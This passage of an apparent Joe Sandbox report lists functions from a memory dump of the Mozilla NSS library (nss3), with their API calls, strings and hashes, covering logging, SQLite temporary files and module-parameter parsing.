calloc.MOZGLUE(00000001,00000014), ref: 6C730BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6C730C15

Strings

Loaded library %s (load lib), xrefs: 6C730D6F
/G6/, xrefs: 6C730AF0
error %d, xrefs: 6C730D08

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: /G6/$Loaded library %s (load lib)$error %d
API String ID: 2139286163-3837687938
Opcode ID: 6bb34ef7b15e53932919cd8777b14df07d0be8131859dc2510a2a3ae07573216
Instruction ID: 5d046b4a18ed9a73f552efa6bca338d280d5278cf0284c164ee8d4994925683a
Opcode Fuzzy Hash: 6bb34ef7b15e53932919cd8777b14df07d0be8131859dc2510a2a3ae07573216
Instruction Fuzzy Hash: 217108B0A012609FDB209F29DE487AB7BF8EB45358F040179E80DD7742EB319E44CBA1

Function 6C77CB70 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6C79444C,00000000,00000000,00000000,?,6C757F7C,6C7580DD), ref: 6C77CB8B

Part of subcall function 6C731240: TlsGetValue.KERNEL32(00000040,?,6C73116C,NSPR_LOG_MODULES), ref: 6C731267
Part of subcall function 6C731240: EnterCriticalSection.KERNEL32(?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C73127C
Part of subcall function 6C731240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C731291
Part of subcall function 6C731240: PR_Unlock.NSS3(?,?,?,?,6C73116C,NSPR_LOG_MODULES), ref: 6C7312A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C88DEB5,?,6C79444C,00000000,00000000,00000000,?,6C757F7C,6C7580DD), ref: 6C77CB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6C79444C,00000000,00000000,00000000,?,6C757F7C,6C7580DD), ref: 6C77CBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6C79444C,00000000,00000000,00000000), ref: 6C77CBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C79444C,00000000,00000000,00000000), ref: 6C77CC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C79444C,00000000,00000000), ref: 6C77CCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C77CD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C79444C,00000000), ref: 6C77CDA6
PR_IntervalToMilliseconds.NSS3(LDyl,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C79444C), ref: 6C77CE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C77CE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6C77CE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C77CE72

Strings

Totals, xrefs: 6C77CE2E
%-25s %10d %10d%2s , xrefs: 6C77CCD3
Function, xrefs: 6C77CBCD
% Time, xrefs: 6C77CBB9
Avg., xrefs: 6C77CBBE
# Calls, xrefs: 6C77CBC8
%-25s %10s %12s %12s %10s, xrefs: 6C77CBD2
NSS_OUTPUT_FILE, xrefs: 6C77CB86
LDyl, xrefs: 6C77CDAE, 6C77CE01, 6C77CE1D
Maximum number of concurrent open sessions: %d, xrefs: 6C77CE4A
%25s %10d %10d%2s, xrefs: 6C77CE33

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$LDyl$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-640786595
Opcode ID: 10f59bc31d47e0e9c48d52043467cd80cfe70749b16a55a74df8b8d163c4354f
Instruction ID: 809f408f0d1a1855d6c14165d403f9ba3a4113c392e671515f132017aae9628f
Opcode Fuzzy Hash: 10f59bc31d47e0e9c48d52043467cd80cfe70749b16a55a74df8b8d163c4354f
Instruction Fuzzy Hash: 61718B32E001444BCF31B67D5F0AA5EB6789F9A349F544A36E80A76F52F7614854C3F2

Function 6C816E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C72F9C9,?,6C72F4DA,6C72F9C9,?,?,6C6F369A), ref: 6C6CCA7A
Part of subcall function 6C6CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6CCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C6DBE66), ref: 6C816E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C6DBE66), ref: 6C816E98
sqlite3_snprintf.NSS3(?,00000000,6C87AAF9,?,?,?,?,?,?,6C6DBE66), ref: 6C816EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C6DBE66), ref: 6C816ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C6DBE66), ref: 6C816EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C6DBE66), ref: 6C816F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C816F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C816F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C6DBE66), ref: 6C816FA6
sqlite3_snprintf.NSS3(?,00000000,6C87AAF9,00000000,?,?,?,?,?,?,?,6C6DBE66), ref: 6C816FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C816FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C816FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C817014
sqlite3_free.NSS3(00000000,?,?,?,?,6C6DBE66), ref: 6C81701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C6DBE66), ref: 6C817030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C6DBE66), ref: 6C81705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C6DBE66), ref: 6C817079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C817097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C6DBE66), ref: 6C8170A0

Strings

winGetTempname1, xrefs: 6C81708F
winGetTempname2, xrefs: 6C8170C4
winGetTempname4, xrefs: 6C817046
winGetTempname5, xrefs: 6C817071
mz_etilqs_, xrefs: 6C816F18

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 2e71648383ef9ad7ca1ad47f6ee514a516a0238a1e508b91e4a0d86ee1b8f29d
Instruction ID: c6b0e52b5784340c0237a6530a41653709cfd949d86617119e77533230fee897
Opcode Fuzzy Hash: 2e71648383ef9ad7ca1ad47f6ee514a516a0238a1e508b91e4a0d86ee1b8f29d
Instruction Fuzzy Hash: 0A5159B1B082126BE73096249D55FBB36A6DF9230CF144E38E80596FC2FB25951EC2D7

Function 6C7A4FE0 Relevance: 42.2, APIs: 18, Strings: 6, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7575C2,00000000,00000000,00000001), ref: 6C7A5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7575C2,00000000), ref: 6C7A5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C7A5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7A50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7575C2), ref: 6C7A50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7A50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A5153
free.MOZGLUE(?), ref: 6C7A516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7A517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5195

Strings

parameters=, xrefs: 6C7A506B
/G6/, xrefs: 6C7A4FE9
library=, xrefs: 6C7A5043
name=, xrefs: 6C7A5057
config=, xrefs: 6C7A509B
nss=, xrefs: 6C7A5083

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: /G6/$config=$library=$name=$nss=$parameters=
API String ID: 391827415-3152521349
Opcode ID: 6c090dfffb859d37ff404bab199b8918cf75908643d421d1686ec697c06af2c7
Instruction ID: a8e80cc16b396e514fff386a5091cb947eec691badc272097fe4e4eabb343009
Opcode Fuzzy Hash: 6c090dfffb859d37ff404bab199b8918cf75908643d421d1686ec697c06af2c7
Instruction Fuzzy Hash: B351E9B5A015056BEB50DF64EE45AAF37B8AF05288F140430FC19E7B41EB25E916C7F2

Function 6C778E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C778E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C778EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C778EB3

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C778EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C778EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C778F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C778F29
PR_LogPrint.NSS3(?,00000000), ref: 6C778F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C778F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C778F80
PR_LogPrint.NSS3(?,00000000), ref: 6C778F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C778FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C778FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C779047

Strings

(CK_INVALID_HANDLE), xrefs: 6C778EAC, 6C778F1F, 6C778F79
*pulWrappedKeyLen = 0x%x, xrefs: 6C779042
hKey = 0x%x, xrefs: 6C778F5B, 6C778F6B
/G6/, xrefs: 6C778E5C
pMechanism = 0x%p, xrefs: 6C778EE0
hWrappingKey = 0x%x, xrefs: 6C778F01, 6C778F11
C_WrapKey, xrefs: 6C778E71
hSession = 0x%x, xrefs: 6C778E8E, 6C778E9E
pulWrappedKeyLen = 0x%p, xrefs: 6C778FC8
pWrappedKey = 0x%p, xrefs: 6C778FAD

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_WrapKey
API String ID: 1003633598-2789039576
Opcode ID: 1f54b37db6146185903ae5fdf890fdb62ad023896ac2d53ccce9e767c6b96045
Instruction ID: 9ba37d7569c257080259010ce010b925c6bac39d38cf622e1c7ea59160ff2dad
Opcode Fuzzy Hash: 1f54b37db6146185903ae5fdf890fdb62ad023896ac2d53ccce9e767c6b96045
Instruction Fuzzy Hash: 8151C232601109ABDF309F55EF4CF9E3B66AB4230CF484436F90967A12D734A818DBA2

Function 6C782D80 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C782DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C782E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C782E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C782E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C754F1C,?,-00000001,00000000,?), ref: 6C782E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C754F1C,?,-00000001,00000000), ref: 6C782E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C782EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C782EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C782EF8
PR_Unlock.NSS3(?), ref: 6C782F62
TlsGetValue.KERNEL32 ref: 6C782F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C782F9E
PR_Unlock.NSS3(?), ref: 6C782FCA
TlsGetValue.KERNEL32 ref: 6C78301A
EnterCriticalSection.KERNEL32(?), ref: 6C78302E
PR_Unlock.NSS3(?), ref: 6C783066
PR_SetError.NSS3(00000000,00000000), ref: 6C783085
PR_Unlock.NSS3(?), ref: 6C7830EC
TlsGetValue.KERNEL32 ref: 6C78310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C783124
PR_Unlock.NSS3(?), ref: 6C78314C

Part of subcall function 6C769180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C79379E,?,6C769568,00000000,?,6C79379E,?,00000001,?), ref: 6C76918D
Part of subcall function 6C769180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C79379E,?,6C769568,00000000,?,6C79379E,?,00000001,?), ref: 6C7691A0

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

PR_SetError.NSS3(00000000,00000000), ref: 6C78316D

Strings

/G6/, xrefs: 6C782D92

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID: /G6/
API String ID: 3383223490-570549270
Opcode ID: 5cff853936818fa20a7d06810e193c925a827f08de008509e5a1d818ea494d58
Instruction ID: c1f0f65bd212ffca99713a66bbb345e5d34fdb62a1dfe22ae7065182045430a4
Opcode Fuzzy Hash: 5cff853936818fa20a7d06810e193c925a827f08de008509e5a1d818ea494d58
Instruction Fuzzy Hash: 35F1BBB1D01608AFDF10DFA8D988B9EBBB5BF09318F144179ED04A7711EB31A895CB91

Function 6C7A4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C794F51,00000000), ref: 6C7A4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C794F51,00000000), ref: 6C7A4C5B
PR_smprintf.NSS3(6C87AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C794F51,00000000), ref: 6C7A4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C794F51,00000000), ref: 6C7A4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7A4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C794F51,00000000), ref: 6C7A4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C794F51,00000000), ref: 6C7A4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C7A4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C7A4DA2
free.MOZGLUE(?), ref: 6C7A4DB9
free.MOZGLUE(00000000), ref: 6C7A4DCF

Strings

every, xrefs: 6C7A4CA1
any, xrefs: 6C7A4C96
%s,%s, xrefs: 6C7A4C4B
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C7A4D9D
timeout, xrefs: 6C7A4C91
rootFlags, xrefs: 6C7A4D47
0x%08lx=[%s %s], xrefs: 6C7A4D80
ootT, xrefs: 6C7A4D1A
slotFlags, xrefs: 6C7A4D34
rust, xrefs: 6C7A4D22

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 47baf5706a66ac5517259023925d79759d641a06e6a3b69a5e4f66403b024371
Instruction ID: 5837d1851d1837e7f0dea1345dccaf4c90b73f418f61dfc8707818d2b1432d6b
Opcode Fuzzy Hash: 47baf5706a66ac5517259023925d79759d641a06e6a3b69a5e4f66403b024371
Instruction Fuzzy Hash: 2441BEB29001416BDB325F589E49ABF7A75AF9230CF544234EC0A1B702EB36D825D7E3

Function 6C786910 Relevance: 40.4, APIs: 15, Strings: 8, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C786943

Part of subcall function 6C7A4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,E436472F,flags,?,00000000,?,6C785947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C7A4220
Part of subcall function 6C7A4210: NSSUTIL_ArgGetParamValue.NSS3(?,GYxl,?,?,?,?,?,?,00000000,?,00000000,?,6C787703,?,00000000,00000000), ref: 6C7A422D
Part of subcall function 6C7A4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C787703), ref: 6C7A424B
Part of subcall function 6C7A4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C787703,?,00000000), ref: 6C7A4272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C786957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C786972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C786983

Part of subcall function 6C7A3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C77C79F,?,6C786247,70E85609,?,?,6C77C79F,6C78781D,?,6C77BD52,00000001,70E85609,D85D8B04,?), ref: 6C7A3EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7869AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7869BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7869D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7869DF

Part of subcall function 6C7A4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C7A50B7,?), ref: 6C7A4041

free.MOZGLUE(00000000), ref: 6C7869F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C786A04
free.MOZGLUE(00000000), ref: 6C786A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C786A29
free.MOZGLUE(00000000), ref: 6C786A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C786A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C786A5B

Strings

nocertdb, xrefs: 6C786951
configdir=, xrefs: 6C7869A4
certPrefix=, xrefs: 6C7869B8
/G6/, xrefs: 6C786920
readOnly, xrefs: 6C78693D
nokeydb, xrefs: 6C786968
keyPrefix=, xrefs: 6C7869CC
flags, xrefs: 6C786937, 6C786942, 6C786956, 6C78696D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: /G6/$certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2483406055
